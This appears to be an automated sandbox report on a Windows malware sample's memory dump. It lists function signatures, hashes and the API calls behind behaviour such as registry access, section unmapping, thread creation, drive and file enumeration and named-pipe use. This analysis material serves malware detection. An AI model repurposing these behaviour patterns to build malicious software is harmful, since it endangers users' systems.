    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
